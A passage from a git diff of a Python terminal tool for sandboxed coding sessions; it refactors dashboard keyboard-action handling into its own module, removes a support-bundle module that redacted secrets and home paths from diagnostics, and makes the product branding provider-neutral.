+ underline.append(underline_segment, style="cyan" if is_active else "dim") + + _print_padded(console, tabs, metrics) + _print_padded(console, underline, metrics) + + if not metrics.should_center: + separator_len = max(len(tabs.plain), content_width) + _print_padded(console, Borders.FOOTER_SEPARATOR * separator_len, metrics) + + if subtitle: + if not metrics.tight_height: + console.print() + _print_padded(console, f" {subtitle}", metrics) + console.print() + else: + console.print() + + +def _render_setup_layout( + console: Console, + *, + step_index: int, + subtitle: str | None, + left_title: str, + left_body: Text | Table, + right_title: str, + right_body: Text | Table, + footer_hint: str | None = None, +) -> None: + """Render a two-pane setup layout with a shared header.""" + _render_setup_header(console, step_index=step_index, subtitle=subtitle) + + metrics = _layout_metrics(console) + content_width = metrics.content_width + width = console.size.width + stacked_width = content_width + column_width = max(32, (content_width - 4) // 2) + + expand_panels = width >= 100 + + left_panel = Panel( + left_body, + title=f"[dim]{left_title}[/dim]", + border_style="bright_black", + padding=(0, 1), + box=box.ROUNDED, + width=stacked_width if width < 100 else column_width, + expand=expand_panels, + ) + right_panel = Panel( + right_body, + title=f"[dim]{right_title}[/dim]", + border_style="bright_black", + padding=(0, 1), + box=box.ROUNDED, + width=stacked_width if width < 100 else column_width, + expand=expand_panels, + ) + + if width < 100: + _print_padded(console, left_panel, metrics) + if not metrics.tight_height: + console.print() + _print_padded(console, right_panel, metrics) + else: + columns = Columns([left_panel, right_panel], expand=False, equal=True) + _print_padded(console, columns, metrics) + + console.print() + if footer_hint: + separator_len = max(len(footer_hint), content_width) + _print_padded(console, Borders.FOOTER_SEPARATOR * separator_len, metrics) + _print_padded(console, f" [dim]{footer_hint}[/dim]", metrics) + return + + hints = _build_hint_text( + [ + ("↑↓", "navigate"), + ("Enter", "confirm"), + ("Esc", "cancel"), + ] + ) + separator_len = max(len(hints.plain), content_width) + _print_padded(console, Borders.FOOTER_SEPARATOR * separator_len, metrics) + _print_padded(console, hints, metrics) diff --git a/src/scc_cli/support_bundle.py b/src/scc_cli/support_bundle.py deleted file mode 100644 index ad812c9..0000000 --- a/src/scc_cli/support_bundle.py +++ /dev/null @@ -1,159 +0,0 @@ -from __future__ import annotations - -import json -import platform -import re -import sys -import zipfile -from datetime import datetime, timezone -from pathlib import Path -from typing import Any - -from scc_cli import __version__, config -from scc_cli.doctor.core import run_doctor -from scc_cli.doctor.serialization import build_doctor_json_data - -SECRET_KEY_PATTERNS = [ - r"^auth$", - r".*token.*", - r".*api[_-]?key.*", - r".*apikey.*", - r".*password.*", - r".*secret.*", - r"^authorization$", - r".*credential.*", -] - -_SECRET_PATTERNS = [re.compile(pattern, re.IGNORECASE) for pattern in SECRET_KEY_PATTERNS] - - -def _is_secret_key(key: str) -> bool: - return any(pattern.match(key) for pattern in _SECRET_PATTERNS) - - -def redact_secrets(data: dict[str, Any]) -> dict[str, Any]: - """Redact secret values from a dictionary.""" - - result: dict[str, Any] = {} - - for key, value in data.items(): - if _is_secret_key(key) and isinstance(value, str): - result[key] = "[REDACTED]" - elif isinstance(value, dict): - result[key] = redact_secrets(value) - elif isinstance(value, list): - result[key] = [ - redact_secrets(item) if isinstance(item, dict) else item for item in value - ] - else: - result[key] = value - - return result - - -def redact_paths(data: dict[str, Any], redact: bool = True) -> dict[str, Any]: - """Redact home directory paths from a dictionary.""" - - if not redact: - return data - - home = str(Path.home()) - result: dict[str, Any] = {} - - for key, value in data.items(): - if isinstance(value, str) and home in value: - result[key] = value.replace(home, "~") - elif isinstance(value, dict): - result[key] = redact_paths(value, redact=redact) - elif isinstance(value, list): - result[key] = [ - redact_paths(item, redact=redact) - if isinstance(item, dict) - else (item.replace(home, "~") if isinstance(item, str) and home in item else item) - for item in value - ] - else: - result[key] = value - - return result - - -def build_bundle_data( - redact_paths_flag: bool = True, - workspace_path: Path | None = None, -) -> dict[str, Any]: - """Build support bundle data.""" - - system_info = { - "platform": platform.system(), - "platform_version": platform.version(), - "platform_release": platform.release(), - "machine": platform.machine(), - "python_version": sys.version, - "python_implementation": platform.python_implementation(), - } - - generated_at = datetime.now(timezone.utc).isoformat() - - try: - user_config = config.load_user_config() - if isinstance(user_config, dict): - user_config = redact_secrets(user_config) - except Exception: - user_config = {"error": "Failed to load config"} - - try: - org_config = config.load_cached_org_config() - if org_config: - org_config = redact_secrets(org_config) - except Exception: - org_config = {"error": "Failed to load org config"} - - try: - doctor_result = run_doctor(workspace_path) - doctor_data = build_doctor_json_data(doctor_result) - except Exception as exc: - doctor_data = {"error": f"Failed to run doctor: {exc}"} - - bundle_data: dict[str, Any] = { - "generated_at": generated_at, - "cli_version": __version__, - "system": system_info, - "config": user_config, - "org_config": org_config, - "doctor": doctor_data, - } - - if workspace_path: - bundle_data["workspace"] = str(workspace_path) - - if redact_paths_flag: - bundle_data = redact_paths(bundle_data) - - return bundle_data - - -def get_default_bundle_path() -> Path: - """Get default path for support bundle.""" - - timestamp = datetime.now().strftime("%Y%m%d-%H%M%S") - return Path.cwd() / f"scc-support-bundle-{timestamp}.zip" - - -def create_bundle( - output_path: Path, - redact_paths_flag: bool = True, - workspace_path: Path | None = None, -) -> dict[str, Any]: - """Create a support bundle zip file.""" - - bundle_data = build_bundle_data( - redact_paths_flag=redact_paths_flag, - workspace_path=workspace_path, - ) - - with zipfile.ZipFile(output_path, "w", zipfile.ZIP_DEFLATED) as bundle: - manifest_json = json.dumps(bundle_data, indent=2) - bundle.writestr("manifest.json", manifest_json) - - return bundle_data diff --git a/src/scc_cli/theme.py b/src/scc_cli/theme.py index 383da39..faad61f 100644 --- a/src/scc_cli/theme.py +++ b/src/scc_cli/theme.py @@ -339,10 +339,10 @@ def get_brand_header(*, unicode: bool | None = None) -> str: if use_unicode: return """\ ╭───────────────────────────────────────╮ -│ SCC Sandboxed Claude CLI │ +│ SCC Sandboxed Coding CLI │ ╰───────────────────────────────────────╯""" else: return """\ +---------------------------------------+ -| SCC Sandboxed Claude CLI | +| SCC Sandboxed Coding CLI | +---------------------------------------+""" diff --git a/src/scc_cli/ui/branding.py b/src/scc_cli/ui/branding.py index 284b2e1..e7bbd48 100644 --- a/src/scc_cli/ui/branding.py +++ b/src/scc_cli/ui/branding.py @@ -28,13 +28,13 @@ def get_version_header(version: str) -> str: if supports_unicode(): return ( "╭───────────────────────────────────────╮\n" - f"│ [cyan bold]SCC[/cyan bold] Sandboxed Claude CLI [dim]{v_padded}[/dim] │\n" + f"│ [cyan bold]SCC[/cyan bold] Sandboxed Coding CLI [dim]{v_padded}[/dim] │\n" "╰───────────────────────────────────────╯" ) else: return ( "+---------------------------------------+\n" - f"| [cyan bold]SCC[/cyan bold] Sandboxed Claude CLI [dim]{v_padded}[/dim] |\n" + f"| [cyan bold]SCC[/cyan bold] Sandboxed Coding CLI [dim]{v_padded}[/dim] |\n" "+---------------------------------------+" ) @@ -59,10 +59,19 @@ def get_doctor_header() -> str: ) -def get_brand_tagline() -> str: +def get_brand_tagline(provider_id: str | None = None) -> str: """Get the brand tagline for SCC. + Args: + provider_id: Optional provider ID. When given, the provider's + display name is appended to the tagline. + Returns: The official tagline string. """ - return "Safe development environment manager for Claude Code" + base = "Safe development environment manager" + if provider_id is not None: + from scc_cli.core.provider_resolution import get_provider_display_name + + return f"{base} for {get_provider_display_name(provider_id)}" + return base diff --git a/src/scc_cli/ui/dashboard/_dashboard.py b/src/scc_cli/ui/dashboard/_dashboard.py index 15c7dde..c85d524 100644 --- a/src/scc_cli/ui/dashboard/_dashboard.py +++ b/src/scc_cli/ui/dashboard/_dashboard.py @@ -33,7 +33,6 @@ StatusAction, StatusItem, WorktreeItem, - placeholder_start_reason, placeholder_tip, ) @@ -43,26 +42,7 @@ from ..chrome import Chrome, ChromeConfig, FooterHint, get_layout_metrics from ..keys import ( Action, - ActionType, - ContainerActionMenuRequested, - ContainerRemoveRequested, - ContainerResumeRequested, - ContainerStopRequested, - CreateWorktreeRequested, - GitInitRequested, KeyReader, - ProfileMenuRequested, - RecentWorkspacesRequested, - RefreshRequested, - SandboxImportRequested, - SessionActionMenuRequested, - SessionResumeRequested, - SettingsRequested, - StartRequested, - StatuslineInstallRequested, - TeamSwitchRequested, - VerboseToggleRequested, - WorktreeActionMenuRequested, ) from ..list_screen import ListItem from ..time_format import format_relative_time_from_datetime @@ -337,6 +317,7 @@ def _build_details_header(self, title: str) -> Text: def _render_container_details(self, item: ListItem[Any]) -> RenderableType: """Render details for a container item using structured key/value table.""" + from ...application.dashboard_models import ContainerSummary from ...docker.core import ContainerInfo from ..formatters import _shorten_docker_status @@ -349,7 +330,7 @@ def _render_container_details(self, item: ListItem[Any]) -> RenderableType: table.add_row("Name", Text(item.label, style="bold")) - container: ContainerInfo | None = None + container: ContainerInfo | ContainerSummary | None = None if isinstance(item.value, ContainerItem): container = item.value.container elif isinstance(item.value, ContainerInfo): @@ -612,355 +593,19 @@ def _get_chrome_config(self) -> ChromeConfig: def _handle_action(self, action: Action[None]) -> bool | None: """Handle an action and update state. + Delegates to handle_dashboard_action in _dashboard_actions.py. + Returns: True to force refresh (state changed by us, not action). False to exit dashboard. None to continue (refresh only if action.state_changed). """ - # Selective status clearing: only clear on navigation/filter/tab actions - # This preserves toast messages during non-state-changing actions (e.g., help) - status_clearing_actions = { - ActionType.NAVIGATE_UP, - ActionType.NAVIGATE_DOWN, - ActionType.TAB_NEXT, - ActionType.TAB_PREV, - ActionType.FILTER_CHAR, - ActionType.FILTER_DELETE, - } - # Also clear status on 'r' (refresh), which is a CUSTOM action in dashboard - is_refresh_action = action.action_type == ActionType.CUSTOM and action.custom_key == "r" - if self.state.status_message and ( - action.action_type in status_clearing_actions or is_refresh_action - ): - self.state.status_message = None - - match action.action_type: - case ActionType.NAVIGATE_UP: - self.state.list_state.move_cursor(-1) - - case ActionType.NAVIGATE_DOWN: - self.state.list_state.move_cursor(1) - - case ActionType.TAB_NEXT: - self.state = self.state.next_tab() - - case ActionType.TAB_PREV: - self.state = self.state.prev_tab() - - case ActionType.FILTER_CHAR: - if action.filter_char and self.state.filter_mode: - self.state.list_state.add_filter_char(action.filter_char) - - case ActionType.FILTER_DELETE: - if self.state.filter_mode or self.state.list_state.filter_query: - self.state.list_state.delete_filter_char() - - case ActionType.CANCEL: - # ESC precedence: details → filter → no-op - if self.state.details_open: - self.state.details_open = False - return True - if self.state.filter_mode or self.state.list_state.filter_query: - self.state.list_state.clear_filter() - self.state.filter_mode = False - return True - return None - - case ActionType.QUIT: - return False - - case ActionType.TOGGLE: - # Space toggles details pane - current = self.state.list_state.current_item - if not current: - return None - if self.state.active_tab == DashboardTab.STATUS: - self.state.status_message = "Details not available in Status tab" - return True - if self.state.is_placeholder_selected(): - if isinstance(current.value, PlaceholderItem): - self.state.status_message = self._get_placeholder_tip(current.value) - else: - self.state.status_message = "No details available for this item" - return True - self.state.details_open = not self.state.details_open - return True - - case ActionType.SELECT: - # On Status tab, Enter triggers different actions based on item - if self.state.active_tab == DashboardTab.STATUS: - current = self.state.list_state.current_item - if current and isinstance(current.value, StatusItem): - status_action = current.value.action - if status_action is StatusAction.RESUME_SESSION and current.value.session: - raise SessionResumeRequested( - session=current.value.session, - return_to=self.state.active_tab.name, - ) - - if status_action is StatusAction.START_SESSION: - raise StartRequested( - return_to=self.state.active_tab.name, - reason="dashboard_start", - ) - - if status_action is StatusAction.SWITCH_TEAM: - if scc_config.is_standalone_mode(): - self.state.status_message = ( - "Teams require org mode. Run `scc setup` to configure." - ) - return True - raise TeamSwitchRequested() - - if status_action is StatusAction.OPEN_TAB and current.value.action_tab: - self.state.list_state.clear_filter() - self.state = self.state.switch_tab(current.value.action_tab) - return True - - if status_action is StatusAction.INSTALL_STATUSLINE: - raise StatuslineInstallRequested(return_to=self.state.active_tab.name) - - if status_action is StatusAction.OPEN_PROFILE: - raise ProfileMenuRequested(return_to=self.state.active_tab.name) - - if status_action is StatusAction.OPEN_SETTINGS: - raise SettingsRequested(return_to=self.state.active_tab.name) - else: - # Resource tabs handling (Containers, Worktrees, Sessions) - current = self.state.list_state.current_item - if not current: - return None - - if self.state.is_placeholder_selected(): - if isinstance(current.value, PlaceholderItem): - if current.value.startable: - raise StartRequested( - return_to=self.state.active_tab.name, - reason=placeholder_start_reason(current.value), - ) - self.state.status_message = self._get_placeholder_tip(current.value) - return True - self.state.status_message = "No details available for this item" - return True - - if self.state.active_tab == DashboardTab.SESSIONS and isinstance( - current.value, SessionItem - ): - raise SessionResumeRequested( - session=current.value.session, - return_to=self.state.active_tab.name, - ) - - if self.state.active_tab == DashboardTab.WORKTREES and isinstance( - current.value, WorktreeItem - ): - raise StartRequested( - return_to=self.state.active_tab.name, - reason=f"worktree:{current.value.path}", - ) + from ._dashboard_actions import handle_dashboard_action - if self.state.active_tab == DashboardTab.CONTAINERS and isinstance( - current.value, ContainerItem - ): - raise ContainerActionMenuRequested( - container_id=current.value.container.id, - container_name=current.value.container.name, - return_to=self.state.active_tab.name, - ) - - if self.state.active_tab == DashboardTab.SESSIONS and isinstance( - current.value, SessionItem - ): - raise SessionActionMenuRequested( - session=current.value.session, - return_to=self.state.active_tab.name, - ) - - if self.state.active_tab == DashboardTab.WORKTREES and isinstance( - current.value, WorktreeItem - ): - raise WorktreeActionMenuRequested( - worktree_path=current.value.path, - return_to=self.state.active_tab.name, - ) - - return None - - case ActionType.TOGGLE_ALL: - # 'a' actions menu - current = self.state.list_state.current_item - if not current or self.state.is_placeholder_selected(): - self.state.status_message = "No item selected" - return True - - if self.state.active_tab == DashboardTab.CONTAINERS and isinstance( - current.value, ContainerItem - ): - raise ContainerActionMenuRequested( - container_id=current.value.container.id, - container_name=current.value.container.name, - return_to=self.state.active_tab.name, - ) - - if self.state.active_tab == DashboardTab.SESSIONS and isinstance( - current.value, SessionItem - ): - raise SessionActionMenuRequested( - session=current.value.session, - return_to=self.state.active_tab.name, - ) - - if self.state.active_tab == DashboardTab.WORKTREES and isinstance( - current.value, WorktreeItem - ): - raise WorktreeActionMenuRequested( - worktree_path=current.value.path, - return_to=self.state.active_tab.name, - ) - - return None - - case ActionType.TEAM_SWITCH: - # In standalone mode, show guidance instead of switching - if scc_config.is_standalone_mode(): - self.state.status_message = ( - "Teams require org mode. Run `scc setup` to configure." - ) - return True # Refresh to show message - # Bubble up to orchestrator for consistent team switching - raise TeamSwitchRequested() - - case ActionType.HELP: - # Show help overlay INSIDE the Live context (avoids scroll artifacts) - # The overlay is rendered in _render() and dismissed on next keypress - self.state.help_visible = True - return True # Refresh to show help overlay - - case ActionType.CUSTOM: - # Handle dashboard-specific custom keys (not in DEFAULT_KEY_MAP) - if action.custom_key == "/": - self.state.filter_mode = True - return True - if action.custom_key == "r": - # User pressed 'r' - signal orchestrator to reload tab data - # Uses .name (stable identifier) not .value (display string) - raise RefreshRequested(return_to=self.state.active_tab.name) - elif action.custom_key == "n": - # User pressed 'n' - start new session (skip any resume prompts) - raise StartRequested( - return_to=self.state.active_tab.name, - reason="dashboard_new_session", - ) - elif action.custom_key == "s": - # User pressed 's' - open settings and maintenance screen - raise SettingsRequested(return_to=self.state.active_tab.name) - elif action.custom_key == "p": - # User pressed 'p' - open profile menu - # Only works when filter is empty to avoid conflict with type-to-filter - if not self.state.list_state.filter_query: - raise ProfileMenuRequested(return_to=self.state.active_tab.name) - # When filter is active, 'p' is treated as filter char (handled by KeyReader) - elif action.custom_key == "w": - # User pressed 'w' - show recent workspaces picker - # Only active on Worktrees tab - if self.state.active_tab == DashboardTab.WORKTREES: - raise RecentWorkspacesRequested(return_to=self.state.active_tab.name) - elif action.custom_key == "i": - # User pressed 'i' - context-aware action - # Status tab: import sandbox plugins (only when filter is empty) - if self.state.active_tab == DashboardTab.STATUS: - if not self.state.list_state.filter_query: - raise SandboxImportRequested(return_to=self.state.active_tab.name) - elif self.state.active_tab == DashboardTab.WORKTREES: - current = self.state.list_state.current_item - # Only show when placeholder indicates no git repo - is_non_git = ( - current - and isinstance(current.value, PlaceholderItem) - and current.value.kind - in { - PlaceholderKind.NO_GIT, - PlaceholderKind.NO_WORKTREES, - } - ) - if is_non_git: - raise GitInitRequested(return_to=self.state.active_tab.name) - self.state.status_message = "Already in a git repository" - return True - elif action.custom_key == "c": - # User pressed 'c' - create worktree (or clone if not git) - # Only active on Worktrees tab - if self.state.active_tab == DashboardTab.WORKTREES: - current = self.state.list_state.current_item - # Check if we're in a git repo - is_git_repo = True - if current and isinstance(current.value, PlaceholderItem): - is_git_repo = current.value.kind not in { - PlaceholderKind.NO_GIT, - PlaceholderKind.NO_WORKTREES, - } - raise CreateWorktreeRequested( - return_to=self.state.active_tab.name, - is_git_repo=is_git_repo, - ) - elif action.custom_key == "verbose_toggle": - # User pressed 'v' - toggle verbose status display - # Only active on Worktrees tab - if self.state.active_tab == DashboardTab.WORKTREES: - new_verbose = not self.state.verbose_worktrees - raise VerboseToggleRequested( - return_to=self.state.active_tab.name, - verbose=new_verbose, - ) - elif action.custom_key in {"K", "R", "D"}: - # Container actions: stop/resume/delete - if self.state.active_tab == DashboardTab.CONTAINERS: - current = self.state.list_state.current_item - if not current or self.state.is_placeholder_selected(): - self.state.status_message = "No container selected" - return True - - from ...docker.core import ContainerInfo - - key_container: ContainerInfo | None = None - if isinstance(current.value, ContainerItem): - key_container = current.value.container - elif isinstance(current.value, ContainerInfo): - key_container = current.value - elif isinstance(current.value, str): - # Legacy fallback when value is container ID - status = None - if current.description: - parts = current.description.split(" ") - if len(parts) >= 3: - status = parts[2] - key_container = ContainerInfo( - id=current.value, - name=current.label, - status=status or "", - ) - - if not key_container: - self.state.status_message = "Unable to read container metadata" - return True - - if action.custom_key == "K": - raise ContainerStopRequested( - container_id=key_container.id, - container_name=key_container.name, - return_to=self.state.active_tab.name, - ) - if action.custom_key == "R": - raise ContainerResumeRequested( - container_id=key_container.id, - container_name=key_container.name, - return_to=self.state.active_tab.name, - ) - if action.custom_key == "D": - raise ContainerRemoveRequested( - container_id=key_container.id, - container_name=key_container.name, - return_to=self.state.active_tab.name, - ) - - return None + self.state, result = handle_dashboard_action( + self.state, + action, + is_standalone=scc_config.is_standalone_mode(), + get_placeholder_tip=self._get_placeholder_tip, + ) + return result diff --git a/src/scc_cli/ui/dashboard/_dashboard_actions.py b/src/scc_cli/ui/dashboard/_dashboard_actions.py new file mode 100644 index 0000000..06c9e0f --- /dev/null +++ b/src/scc_cli/ui/dashboard/_dashboard_actions.py @@ -0,0 +1,388 @@ +"""Action handling for the Dashboard component. + +Extracted from _dashboard.py to keep that module focused on rendering +and the run loop. This module contains the `handle_dashboard_action` +function that processes keyboard actions and updates dashboard state. +""" + +from __future__ import annotations + +from typing import TYPE_CHECKING + +from scc_cli.application.dashboard import ( + ContainerItem, + DashboardTab, + PlaceholderItem, + PlaceholderKind, + SessionItem, + StatusAction, + StatusItem, + WorktreeItem, + placeholder_start_reason, +) + +from ..keys import ( + Action, + ActionType, + ContainerActionMenuRequested, + ContainerRemoveRequested, + ContainerResumeRequested, + ContainerStopRequested, + CreateWorktreeRequested, + GitInitRequested, + ProfileMenuRequested, + RecentWorkspacesRequested, + RefreshRequested, + SandboxImportRequested, + SessionActionMenuRequested, + SessionResumeRequested, + SettingsRequested, + StartRequested, + StatuslineInstallRequested, + TeamSwitchRequested, + VerboseToggleRequested, + WorktreeActionMenuRequested, +) + +if TYPE_CHECKING: + from .models import DashboardState + + +def handle_dashboard_action( + state: DashboardState, + action: Action[None], + *, + is_standalone: bool, + get_placeholder_tip: object, +) -> tuple[DashboardState, bool | None]: + """Handle a dashboard keyboard action and update state. + + This is a standalone function extracted from Dashboard._handle_action. + It receives the current state and returns (possibly_updated_state, result). + + Args: + state: Current dashboard state (mutated in place for list_state ops). + action: The keyboard action to handle. + is_standalone: Whether SCC is in standalone mode (no org). + get_placeholder_tip: Callable(PlaceholderItem) -> str for tips. + + Returns: + Tuple of (state, result) where result is: + - True to force refresh (state changed by us, not action). + - False to exit dashboard. + - None to continue (refresh only if action.state_changed). + """ + # Selective status clearing: only clear on navigation/filter/tab actions + status_clearing_actions = { + ActionType.NAVIGATE_UP, + ActionType.NAVIGATE_DOWN, + ActionType.TAB_NEXT, + ActionType.TAB_PREV, + ActionType.FILTER_CHAR, + ActionType.FILTER_DELETE, + } + is_refresh_action = action.action_type == ActionType.CUSTOM and action.custom_key == "r" + if state.status_message and ( + action.action_type in status_clearing_actions or is_refresh_action + ): + state.status_message = None + + match action.action_type: + case ActionType.NAVIGATE_UP: + state.list_state.move_cursor(-1) + + case ActionType.NAVIGATE_DOWN: + state.list_state.move_cursor(1) + + case ActionType.TAB_NEXT: + state = state.next_tab() + + case ActionType.TAB_PREV: + state = state.prev_tab() + + case ActionType.FILTER_CHAR: + if action.filter_char and state.filter_mode: + state.list_state.add_filter_char(action.filter_char) + + case ActionType.FILTER_DELETE: + if state.filter_mode or state.list_state.filter_query: + state.list_state.delete_filter_char() + + case ActionType.CANCEL: + if state.details_open: + state.details_open = False + return state, True + if state.filter_mode or state.list_state.filter_query: + state.list_state.clear_filter() + state.filter_mode = False + return state, True + return state, None + + case ActionType.QUIT: + return state, False + + case ActionType.TOGGLE: + current = state.list_state.current_item + if not current: + return state, None + if state.active_tab == DashboardTab.STATUS: + state.status_message = "Details not available in Status tab" + return state, True + if state.is_placeholder_selected(): + if isinstance(current.value, PlaceholderItem): + state.status_message = get_placeholder_tip(current.value) # type: ignore[operator] + else: + state.status_message = "No details available for this item" + return state, True + state.details_open = not state.details_open + return state, True + + case ActionType.SELECT: + return _handle_select( + state, is_standalone=is_standalone, get_placeholder_tip=get_placeholder_tip + ) + + case ActionType.TOGGLE_ALL: + return _handle_toggle_all(state) + + case ActionType.TEAM_SWITCH: + if is_standalone: + state.status_message = "Teams require org mode. Run `scc setup` to configure." + return state, True + raise TeamSwitchRequested() + + case ActionType.HELP: + state.help_visible = True + return state, True + + case ActionType.CUSTOM: + return _handle_custom(state, action, is_standalone=is_standalone) + + return state, None + + +def _handle_select( + state: DashboardState, + *, + is_standalone: bool, + get_placeholder_tip: object, +) -> tuple[DashboardState, bool | None]: + """Handle Enter/Select action.""" + if state.active_tab == DashboardTab.STATUS: + current = state.list_state.current_item + if current and isinstance(current.value, StatusItem): + status_action = current.value.action + if status_action is StatusAction.RESUME_SESSION and current.value.session: + raise SessionResumeRequested( + session=current.value.session, + return_to=state.active_tab.name, + ) + if status_action is StatusAction.START_SESSION: + raise StartRequested( + return_to=state.active_tab.name, + reason="dashboard_start", + ) + if status_action is StatusAction.SWITCH_TEAM: + if is_standalone: + state.status_message = "Teams require org mode. Run `scc setup` to configure." + return state, True + raise TeamSwitchRequested() + if status_action is StatusAction.OPEN_TAB and current.value.action_tab: + state.list_state.clear_filter() + state = state.switch_tab(current.value.action_tab) + return state, True + if status_action is StatusAction.INSTALL_STATUSLINE: + raise StatuslineInstallRequested(return_to=state.active_tab.name) + if status_action is StatusAction.OPEN_PROFILE: + raise ProfileMenuRequested(return_to=state.active_tab.name) + if status_action is StatusAction.OPEN_SETTINGS: + raise SettingsRequested(return_to=state.active_tab.name) + else: + current = state.list_state.current_item + if not current: + return state, None + + if state.is_placeholder_selected(): + if isinstance(current.value, PlaceholderItem): + if current.value.startable: + raise StartRequested( + return_to=state.active_tab.name, + reason=placeholder_start_reason(current.value), + ) + state.status_message = get_placeholder_tip(current.value) # type: ignore[operator] + return state, True + state.status_message = "No details available for this item" + return state, True + + if state.active_tab == DashboardTab.SESSIONS and isinstance(current.value, SessionItem): + raise SessionResumeRequested( + session=current.value.session, + return_to=state.active_tab.name, + ) + if state.active_tab == DashboardTab.WORKTREES and isinstance(current.value, WorktreeItem): + raise StartRequested( + return_to=state.active_tab.name, + reason=f"worktree:{current.value.path}", + ) + if state.active_tab == DashboardTab.CONTAINERS and isinstance(current.value, ContainerItem): + raise ContainerActionMenuRequested( + container_id=current.value.container.id, + container_name=current.value.container.name, + return_to=state.active_tab.name, + ) + if state.active_tab == DashboardTab.SESSIONS and isinstance(current.value, SessionItem): + raise SessionActionMenuRequested( + session=current.value.session, + return_to=state.active_tab.name, + ) + if state.active_tab == DashboardTab.WORKTREES and isinstance(current.value, WorktreeItem): + raise WorktreeActionMenuRequested( + worktree_path=current.value.path, + return_to=state.active_tab.name, + ) + return state, None + + return state, None + + +def _handle_toggle_all(state: DashboardState) -> tuple[DashboardState, bool | None]: + """Handle 'a' actions menu.""" + current = state.list_state.current_item + if not current or state.is_placeholder_selected(): + state.status_message = "No item selected" + return state, True + + if state.active_tab == DashboardTab.CONTAINERS and isinstance(current.value, ContainerItem): + raise ContainerActionMenuRequested( + container_id=current.value.container.id, + container_name=current.value.container.name, + return_to=state.active_tab.name, + ) + if state.active_tab == DashboardTab.SESSIONS and isinstance(current.value, SessionItem): + raise SessionActionMenuRequested( + session=current.value.session, + return_to=state.active_tab.name, + ) + if state.active_tab == DashboardTab.WORKTREES and isinstance(current.value, WorktreeItem): + raise WorktreeActionMenuRequested( + worktree_path=current.value.path, + return_to=state.active_tab.name, + ) + return state, None + + +def _handle_custom( + state: DashboardState, + action: Action[None], + *, + is_standalone: bool, +) -> tuple[DashboardState, bool | None]: + """Handle custom dashboard-specific keys.""" + if action.custom_key == "/": + state.filter_mode = True + return state, True + if action.custom_key == "r": + raise RefreshRequested(return_to=state.active_tab.name) + elif action.custom_key == "n": + raise StartRequested( + return_to=state.active_tab.name, + reason="dashboard_new_session", + ) + elif action.custom_key == "s": + raise SettingsRequested(return_to=state.active_tab.name) + elif action.custom_key == "p": + if not state.list_state.filter_query: + raise ProfileMenuRequested(return_to=state.active_tab.name) + elif action.custom_key == "w": + if state.active_tab == DashboardTab.WORKTREES: + raise RecentWorkspacesRequested(return_to=state.active_tab.name) + elif action.custom_key == "i": + if state.active_tab == DashboardTab.STATUS: + if not state.list_state.filter_query: + raise SandboxImportRequested(return_to=state.active_tab.name) + elif state.active_tab == DashboardTab.WORKTREES: + current = state.list_state.current_item + is_non_git = ( + current + and isinstance(current.value, PlaceholderItem) + and current.value.kind + in { + PlaceholderKind.NO_GIT, + PlaceholderKind.NO_WORKTREES, + } + ) + if is_non_git: + raise GitInitRequested(return_to=state.active_tab.name) + state.status_message = "Already in a git repository" + return state, True + elif action.custom_key == "c": + if state.active_tab == DashboardTab.WORKTREES: + current = state.list_state.current_item + is_git_repo = True + if current and isinstance(current.value, PlaceholderItem): + is_git_repo = current.value.kind not in { + PlaceholderKind.NO_GIT, + PlaceholderKind.NO_WORKTREES, + } + raise CreateWorktreeRequested( + return_to=state.active_tab.name, + is_git_repo=is_git_repo, + ) + elif action.custom_key == "verbose_toggle": + if state.active_tab == DashboardTab.WORKTREES: + new_verbose = not state.verbose_worktrees + raise VerboseToggleRequested( + return_to=state.active_tab.name, + verbose=new_verbose, + ) + elif action.custom_key in {"K", "R", "D"}: + if state.active_tab == DashboardTab.CONTAINERS: + current = state.list_state.current_item + if not current or state.is_placeholder_selected(): + state.status_message = "No container selected" + return state, True + + from ...application.dashboard_models import ContainerSummary + from ...docker.core import ContainerInfo + + key_container: ContainerInfo | ContainerSummary | None = None + if isinstance(current.value, ContainerItem): + key_container = current.value.container + elif isinstance(current.value, ContainerInfo): + key_container = current.value + elif isinstance(current.value, str): + status = None + if current.description: + parts = current.description.split(" ") + if len(parts) >= 3: + status = parts[2] + key_container = ContainerInfo( + id=current.value, + name=current.label, + status=status or "", + ) + + if not key_container: + state.status_message = "Unable to read container metadata" + return state, True + + if action.custom_key == "K": + raise ContainerStopRequested( + container_id=key_container.id, + container_name=key_container.name, + return_to=state.active_tab.name, + ) + if action.custom_key == "R": + raise ContainerResumeRequested( + container_id=key_container.id, + container_name=key_container.name, + return_to=state.active_tab.name, + ) + if action.custom_key == "D": + raise ContainerRemoveRequested( + container_id=key_container.id, + container_name=key_container.name, + return_to=state.active_tab.name, + ) + + return state, None diff --git a/src/scc_cli/ui/dashboard/loaders.py b/src/scc_cli/ui/dashboard/loaders.py index 90c9152..ce11a41 100644 --- a/src/scc_cli/ui/dashboard/loaders.py +++ b/src/scc_cli/ui/dashboard/loaders.py @@ -37,7 +37,7 @@ def _load_containers_tab_data() -> TabData: def _load_sessions_tab_data() -> TabData: - """Load Sessions tab data showing recent Claude sessions.""" + """Load Sessions tab data showing recent sessions.""" session_service = sessions.get_session_service() tab_data = app_dashboard.load_sessions_tab_data( session_service=session_service, diff --git a/src/scc_cli/ui/dashboard/orchestrator.py b/src/scc_cli/ui/dashboard/orchestrator.py index 67723e8..40e10fb 100644 --- a/src/scc_cli/ui/dashboard/orchestrator.py +++ b/src/scc_cli/ui/dashboard/orchestrator.py @@ -2,9 +2,9 @@ This module contains the entry point and flow handlers: - run_dashboard: Main entry point for `scc` with no arguments -- _handle_team_switch: Team picker integration -- _handle_start_flow: Start wizard integration -- _handle_session_resume: Session resume logic +- _apply_event / _run_effect: Event routing and effect execution + +Handler implementations live in orchestrator_handlers.py. The orchestrator manages the dashboard lifecycle including intent exceptions that exit the Rich Live context before handling nested UI components. @@ -14,19 +14,9 @@ from collections.abc import Mapping from datetime import datetime -from typing import TYPE_CHECKING - -from ... import sessions -from ...console import get_err_console - -if TYPE_CHECKING: - from rich.console import Console from scc_cli.application import dashboard as app_dashboard -from scc_cli.ports.session_models import SessionSummary -from ...confirm import Confirm -from ..chrome import print_with_layout from ..keys import ( ContainerActionMenuRequested, ContainerRemoveRequested, @@ -53,6 +43,57 @@ from .loaders import _to_tab_data from .models import DashboardState +# Re-export handler functions for backward compatibility and __init__.py +from .orchestrator_handlers import ( + _handle_clone, + _handle_container_action_menu, + _handle_container_remove, + _handle_container_resume, + _handle_container_stop, + _handle_create_worktree, + _handle_git_init, + _handle_profile_menu, + _handle_recent_workspaces, + _handle_sandbox_import, + _handle_session_action_menu, + _handle_session_resume, + _handle_settings, + _handle_start_flow, + _handle_statusline_install, + 